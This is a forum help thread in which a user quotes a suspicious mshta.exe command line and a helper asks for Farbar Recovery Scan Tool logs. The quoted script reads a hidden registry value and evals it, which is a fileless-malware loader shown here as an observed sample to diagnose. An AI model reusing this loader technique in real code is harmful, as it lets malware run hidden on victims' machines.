Sathish Posted January 25, 2017 ID:1094087 Share Posted January 25, 2017 mshta.exe process started with suspicions command line arguments : <script>gV4GGALK=\"9kLW0iO\";S21Q=new ActiveXObject(\"WScript.Shell\");NCa2gh=\"DphQRc\";Eefp9=S21Q.RegRead(\"HKCU\\\\software\\\\thinxeu\\\\nhnptdvinh\");x0LCt6=\"tbve4\";eval(Eefp9);ce1J1zH=\"IxCfAj9e\";</script>\" Could you please help here to investigate, what mshta is actually executing in browser. What is above command argument meant for. Your help is much appreciated. Link to post Share on other sites More sharing options...
TwinHeadedEagle Posted January 25, 2017 ID:1094147 Share Posted January 25, 2017 Hello and Please download Farbar Recovery Scan Tool and save it to your desktop. Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version. Double-click to run it. When the tool opens click Yes to disclaimer. Press Scan button. button. It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply. The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply. Link to post Share on other sites More sharing options...
Recommended Posts